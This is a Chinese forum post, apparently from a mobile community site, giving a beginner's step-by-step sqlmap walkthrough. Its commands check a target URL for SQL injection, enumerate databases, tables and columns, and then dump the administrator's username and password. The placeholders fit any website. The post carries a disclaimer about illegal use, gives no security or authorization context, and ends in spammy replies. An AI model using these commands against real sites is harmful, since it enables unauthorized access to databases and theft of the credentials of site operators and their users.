小白渗透必备工具sqlmap的使用方法
首先,需要一个本期的主角:sqlmap[玫瑰][滑稽][玫瑰]先声明一下,问问题可以,请好好看看帖子和置顶内容,没有的自然会回你,有的我就不管了[阴险]
再声明一下,一切违法违规行为与本人无关,请在下载24小时内删除
下载的命令
git clone **** Hidden Message *****
下面的是给小白先了解一下的,会一点的可以往下翻(用的是靶场,违规不得已才改成这样[泪])
首先检测一个站点是否能进行sql注入
输入命令:(网址后面必须是什么什么等于一个数字例如id=1)
sqlmap -u "这里是你的网址" --batch
他就会自动扫描出现图4
就大概率代表可以注入
然后输入:
sqlmap -u "你的地址" --batch --dbs
看到像图5那样,然后输入以下命令
sqlmap -u "你的地址" --batch -D 随便选一个之前爆出来的库放在这里例如我之前的maoshe --tables
然后出现图6,这些是库里的表,然后输入命令
sqlmap -u "你的网址" --batch -D 看上次的解释 -T 这里填你要爆破的表名例如我的admin --columns
然后出现图7,这些就是具体的数据了
然后输入命令(进行爆破账号和密码)
sqlmap -u "你的网址" --batch -D 看上次的解释 -T 看上次的解释 -C username,password --dump
然后出现图8,这里就是管理员的账号和密码了(没爆破完,网不好[心碎])
这个是手册几乎包括所有sqlmap的使用方法
**** Hidden Message *****
密码:50s9
http://cdn.u1.huluxia.com/g4/M03/13/D8/rBAAdmKVu3WAEO_WAAD3uDM6ztE433.jpghttp://cdn.u1.huluxia.com/g4/M03/13/D8/rBAAdmKVu3mAasFHAANIBNn5uR8100.jpghttp://cdn.u1.huluxia.com/g4/M03/13/D8/rBAAdmKVu36AV-WNAAKp-43ORd4452.jpghttp://cdn.u1.huluxia.com/g4/M01/13/D8/rBAAdmKVu4OAO58PAAIh4dwEjL8488.jpghttp://cdn.u1.huluxia.com/g4/M01/13/D9/rBAAdmKVu4iAFaTyAANSEBozPhY750.jpghttp://cdn.u1.huluxia.com/g4/M01/13/D9/rBAAdmKVu4yAL5M9AAN0diFJ8cU026.jpghttp://cdn.u1.huluxia.com/g4/M01/13/D9/rBAAdmKVu46AKpgxAAN5Y01nL64324.jpghttp://cdn.u1.huluxia.com/g4/M01/13/D9/rBAAdmKVu5GAUxw3AAPa0OVcO9U755.jpg 呵呵。。。 边撸边过 介是神马?!! 楼下的接上 啊啊啊啊啊啊啊啊啊啊啊
页:
[1]